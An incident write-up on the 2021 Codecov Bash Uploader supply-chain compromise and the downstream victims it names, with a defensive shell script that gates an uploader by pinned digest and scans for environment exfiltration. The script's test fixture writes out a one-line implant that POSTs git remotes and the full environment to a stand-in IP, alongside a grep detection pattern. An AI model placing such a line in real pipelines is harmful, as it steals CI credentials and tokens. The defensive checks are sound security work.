⛓ Supply Chain
Codecov Bash Uploader Supply Chain Attack — CircleCI, Twilio, Atlassian, Confluent Downstream
Incident Details
Between 31 January and 1 April 2021, attackers modified Codecov's Bash Uploader script, which thousands of CI/CD pipelines fetched and executed (typically via `curl ... | bash`) to upload code coverage reports. The tampered script added a single line that POSTed the pipeline's environment variables, including credentials, tokens, and API keys, together with the repository's git remotes, to an attacker-controlled server addressed by a hard-coded IP. Codecov discovered the compromise on 1 April 2021 and disclosed it publicly on 15 April.

The downstream impact was significant. Twilio confirmed that an exposed token was used to access its repositories and a small number of customer email addresses; Atlassian confirmed exposure of credentials; HashiCorp confirmed that the GPG private key used to sign its release checksums was exposed and rotated it. Snyk, The Washington Post, Shopify, and many others investigated. Atlassian, Twilio, HashiCorp, Confluent, and Procore were among the major confirmed victims, and the attacker used stolen credentials to reach downstream environments. The FBI assisted Codecov in the investigation.

The attack was notable because it ran silently in CI pipelines for over two months, affecting both open-source projects and private enterprise pipelines, and because it compromised a widely used CI tool to harvest secrets at scale, a pattern that has recurred in later CI supply chain compromises. Codecov's disclosure did not attribute the attack to a specific threat actor.
Technical Details
- Initial Attack Vector
- An error in Codecov's Docker image creation process allowed the attacker to extract, from the image, the credential that protected Codecov's Google Cloud Storage bucket; that credential was used to modify the Bash Uploader script served to CI/CD pipelines; the tampered script exfiltrated CI environment variables (secrets, tokens, keys) and git remote URLs to an attacker-controlled server
- Vendor / Product
- Codecov Bash Uploader (codecov.io CI/CD coverage tool)
- Software Package
- codecov-bash
- Supply Chain Attack
- ✅ Confirmed third-party / vendor compromise
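Two checks a pipeline owner would have wanted in front of a `curl ... | bash` uploader step, written here as an added example rather than Codecov's own tooling: compare the downloaded script against a digest pinned in the repository, and refuse any script that hands an environment dump to curl or wget, the shape of the 2021 implant. The "clean" and "tampered" scripts, the pinned digest (taken from the known-good copy as a stand-in for a vendor-published checksum), and the documentation-range IP address are all constructed for the demonstration.

```shell
#!/usr/bin/env bash
# Added example, not Codecov's code. Gates for a "curl ... | bash" upload step:
#   1. verify_pinned       - downloaded script must match a digest pinned in the repo
#   2. scan_for_env_exfil  - refuse scripts that POST $(env)/printenv output via curl/wget
# All sample scripts, the pinned digest and the 203.0.113.10 address are constructed.
set -euo pipefail

sha256_of() {                      # hex SHA-256 of a file, GNU or BSD userland
  local out
  if command -v sha256sum >/dev/null 2>&1; then out="$(sha256sum "$1")"
  else out="$(shasum -a 256 "$1")"; fi
  printf '%s\n' "${out%% *}"
}

# verify_pinned FILE PINNED_SHA256 -> 0 only if the file matches the pinned digest
verify_pinned() {
  [ "$(sha256_of "$1")" = "$2" ]
}

# scan_for_env_exfil FILE -> 0 if a curl/wget line carries an environment dump
scan_for_env_exfil() {
  grep -Eq '(curl|wget).*(\$\(env\)|\$\(printenv\)|`env`)' "$1"
}

# gate_uploader FILE PINNED_SHA256 -> 0 safe to run, 2 digest mismatch, 3 exfil pattern
gate_uploader() {
  if ! verify_pinned "$1" "$2"; then
    echo "refusing $1: digest does not match pinned value" >&2; return 2
  fi
  if scan_for_env_exfil "$1"; then
    echo "refusing $1: environment dump handed to curl/wget" >&2; return 3
  fi
  return 0
}

# --- constructed sample inputs ---------------------------------------------
CLEAN_SCRIPT="$(mktemp)"; TAMPERED_SCRIPT="$(mktemp)"
trap 'rm -f "$CLEAN_SCRIPT" "$TAMPERED_SCRIPT"' EXIT

# Stand-in for a benign uploader: it POSTs only the coverage report.
cat >"$CLEAN_SCRIPT" <<'EOF'
#!/usr/bin/env bash
url="https://codecov.example/upload/v2"
curl -X POST --data-binary @coverage.txt "$url?commit=$(git rev-parse HEAD)"
EOF

# Same script plus a one-line implant shaped like the disclosed one: git remotes
# and the whole environment POSTed to a hard-coded host, short timeout, '|| true'
# so a dead collector never fails the build and draws attention.
cp "$CLEAN_SCRIPT" "$TAMPERED_SCRIPT"
cat >>"$TAMPERED_SCRIPT" <<'EOF'
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://203.0.113.10/upload/v2 || true
EOF

# Stand-in for the vendor-published digest, computed from the known-good copy.
PINNED_SHA256="$(sha256_of "$CLEAN_SCRIPT")"

gate_uploader "$CLEAN_SCRIPT" "$PINNED_SHA256" && echo "clean copy: ok to run"
gate_uploader "$TAMPERED_SCRIPT" "$PINNED_SHA256" || echo "tampered copy rejected (rc=$?)"
scan_for_env_exfil "$TAMPERED_SCRIPT" && echo "tampered copy: env dump to curl found"
```

The digest gate is the one that actually closes the hole: a pinned SHA-256 fails the moment the served script changes, whatever the change looks like. The pattern scan is a second, weaker line that catches this specific implant and flags a uploader update that suddenly starts shipping `$(env)`; it would not catch an exfiltration written differently, so it is not a substitute for pinning. Pinning also means a legitimate uploader update needs a deliberate digest bump in the repo, which is the point.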
Timeline
- 2021-01-31 Tampered Bash Uploader first served from Codecov's infrastructure
- 2021-04-01 Compromise discovered by Codecov
- 2021-04-15 Publicly disclosed
- 2021-04-15 Customers notified